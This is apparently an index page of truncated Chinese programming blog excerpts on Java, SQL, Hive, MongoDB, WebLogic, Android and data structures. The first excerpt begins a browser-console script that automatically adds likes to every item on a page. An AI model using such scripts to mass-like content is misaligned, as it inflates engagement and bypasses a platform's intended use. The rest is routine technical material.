纯粹为了好玩！！逻辑很简单 1 打开浏览器console；输入以下代码。先上添加赞的代码 var tools={}; //添加所有赞 function init(){ document.body.scrollTop=10000; setTimeout(function(){document.body.scrollTop=0;},2000);//加
判断是否为中文灵静志远中文
方法一： public class Zhidao { public static void main(String args[]) { String s = "sdf灭礌 kjl d{';\fdsjlk是"; int n=0; for(int i=0; i<s.length(); i++) { n = (int)s.charAt(i); if((
一个电话面试后总结 a-john 面试
今天，接了一个电话面试，对于还是初学者的我来说，紧张了半天。面试的问题分了层次，对于一类问题，由简到难。自己觉得回答不好的地方作了一下总结：在谈到集合类的时候，举几个常用的集合类，想都没想，直接说了list,map。然后对list和map分别举几个类型： list方面：ArrayList,LinkedList。在谈到他们的区别时，愣住了
MSSQL中Escape转义的使用 aijuans MSSQL
IF OBJECT_ID('tempdb..#ABC') is not null drop table tempdb..#ABC create table #ABC ( PATHNAME NVARCHAR(50) ) insert into #ABC SELECT N'/ABCDEFGHI' UNION ALL SELECT N'/ABCDGAFGASASSDFA' UNION ALL
一个简单的存储过程 asialee mysql 存储过程构造数据批量插入
今天要批量的生成一批测试数据，其中中间有部分数据是变化的，本来想写个程序来生成的，后来想到存储过程就可以搞定，所以随手写了一个，记录在此： DELIMITER $$ DROP PROCEDURE IF EXISTS inse
annot convert from HomeFragment_1 to Fragment 百合不是茶 android 导包错误
创建了几个类继承Fragment, 需要将创建的类存储在ArrayList<Fragment>中; 出现不能将new 出来的对象放到队列中,原因很简单; 创建类时引入包是:import android.app.Fragment; 创建队列和对象时使用的包是:import android.support.v4.ap
Weblogic10两种修改端口的方法 bijian1013 weblogic 端口号配置管理 config.xml
一.进入控制台进行修改 1.进入控制台: http://127.0.0.1:7001/console 2.展开左边树菜单域结构->环境->服务器-->点击AdminServer(管理) &
mysql 操作指令征客丶 mysql
一、连接mysql 进入 mysql 的安装目录； $ bin/mysql -p [host IP 如果是登录本地的mysql 可以不写 -p 直接 -u] -u [userName] -p 输入密码，回车，接连；二、权限操作［如果你很了解mysql数据库后，你可以直接去修改系统表，然后用 mysql> flush privileges; 指令让权限生效］ 1、赋权 mys
【Hive一】Hive入门 bit1129 hive
Hive安装与配置 Hive的运行需要依赖于Hadoop，因此需要首先安装Hadoop2.5.2，并且Hive的启动前需要首先启动Hadoop。 Hive安装和配置的步骤 1. 从如下地址下载Hive0.14.0 http://mirror.bit.edu.cn/apache/hive/ 2.解压hive，在系统变
ajax 三种提交请求的方法 BlueSkator Ajax jqery
1、ajax 提交请求 $.ajax({ type:"post", url : "${ctx}/front/Hotel/getAllHotelByAjax.do", dataType : "json", success : function(result) { try { for(v
mongodb开发环境下的搭建入门 braveCS 运维
linux下安装mongodb 1）官网下载mongodb-linux-x86_64-rhel62-3.0.4.gz 2）linux 解压 gzip -d mongodb-linux-x86_64-rhel62-3.0.4.gz; mv mongodb-linux-x86_64-rhel62-3.0.4 mongodb-linux-x86_64-rhel62-
编程之美-最短摘要的生成 bylijinnan java 数据结构算法编程之美
import java.util.HashMap; import java.util.Map; import java.util.Map.Entry; public class ShortestAbstract { /** * 编程之美最短摘要的生成 * 扫描过程始终保持一个[pBegin,pEnd]的range,初始化确保[pBegin,pEnd]的ran
json数据解析及typeof chengxuyuancsdn js typeof json解析
// json格式 var people='{"authors": [{"firstName": "AAA","lastName": "BBB"},' +' {"firstName": "CCC&
流程系统设计的层次和目标 comsci 设计模式数据结构 sql 框架脚本
流程系统设计的层次和目标
RMAN List和report 命令 daizj oracle list report rman
LIST 命令使用RMAN LIST 命令显示有关资料档案库中记录的备份集、代理副本和映像副本的信息。使用此命令可列出： • RMAN 资料档案库中状态不是AVAILABLE 的备份和副本 • 可用的且可以用于还原操作的数据文件备份和副本 • 备份集和副本，其中包含指定数据文件列表或指定表空间的备份 • 包含指定名称或范围的所有归档日志备份的备份集和副本 • 由标记、完成时间、可
二叉树:红黑树 dieslrae 二叉树
红黑树是一种自平衡的二叉树,它的查找,插入,删除操作时间复杂度皆为O(logN),不会出现普通二叉搜索树在最差情况时时间复杂度会变为O(N)的问题. 红黑树必须遵循红黑规则,规则如下 1、每个节点不是红就是黑。 2、根总是黑的 &
C语言homework3，7个小题目的代码 dcj3sjt126com c
1、打印100以内的所有奇数。 # include <stdio.h> int main(void) { int i; for (i=1; i<=100; i++) { if (i%2 != 0) printf("%d ", i); } return 0; } 2、从键盘上输入10个整数，
自定义按钮, 图片在上, 文字在下, 居中显示 dcj3sjt126com 自定义
#import <UIKit/UIKit.h> @interface MyButton : UIButton -(void)setFrame:(CGRect)frame ImageName:(NSString*)imageName Target:(id)target Action:(SEL)action Title:(NSString*)title Font:(CGFloa
MySQL查询语句练习题，测试足够用了 flyvszhb sql mysql
http://blog.sina.com.cn/s/blog_767d65530101861c.html 1.创建student和score表 CREATE TABLE student ( id INT(10) NOT NULL UNIQUE PRIMARY KEY , name VARCHAR
转：MyBatis Generator 详解 happyqing mybatis
MyBatis Generator 详解 http://blog.csdn.net/isea533/article/details/42102297 MyBatis Generator详解 http://git.oschina.net/free/Mybatis_Utils/blob/master/MybatisGeneator/MybatisGeneator.
让程序员少走弯路的14个忠告 jingjing0907 工作计划学习
无论是谁，在刚进入某个领域之时，有再大的雄心壮志也敌不过眼前的迷茫：不知道应该怎么做，不知道应该做什么。下面是一名软件开发人员所学到的经验，希望能对大家有所帮助 1.不要害怕在工作中学习。只要有电脑，就可以通过电子阅读器阅读报纸和大多数书籍。如果你只是做好自己的本职工作以及分配的任务，那是学不到很多东西的。如果你盲目地要求更多的工作，也是不可能提升自己的。放
nginx和NetScaler区别流浪鱼 nginx
NetScaler是一个完整的包含操作系统和应用交付功能的产品，Nginx并不包含操作系统，在处理连接方面，需要依赖于操作系统，所以在并发连接数方面和防DoS攻击方面，Nginx不具备优势。 2.易用性方面差别也比较大。Nginx对管理员的水平要求比较高，参数比较多，不确定性给运营带来隐患。在NetScaler常见的配置如健康检查，HA等，在Nginx上的配置的实现相对复杂。 3.策略灵活度方
第11章动画效果（下） onestopweb 动画
index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
FAQ - SAP BW BO roadmap blueoxygen BO BW
http://www.sdn.sap.com/irj/boc/business-objects-for-sap-faq Besides, I care that how to integrate tightly. By the way, for BW consultants, please just focus on Query Designer which i
关于java堆内存溢出的几种情况 tomcat_oracle java jvm jdk thread
【情况一】：　　 java.lang.OutOfMemoryError: Java heap space：这种是java堆内存不够，一个原因是真不够，另一个原因是程序中有死循环；　　如果是java堆内存不够的话，可以通过调整JVM下面的配置来解决：　　<jvm-arg>-Xms3062m</jvm-arg> 　　<jvm-arg>-Xmx
Manifest.permission_group权限组阿尔萨斯 Permission
结构继承关系 public static final class Manifest.permission_group extends Object java.lang.Object android. Manifest.permission_group 常量 ACCOUNTS 直接通过统计管理器访问管理的统计 COST_MONEY可以用来让用户花钱但不需要通过与他们直接牵涉的权限 D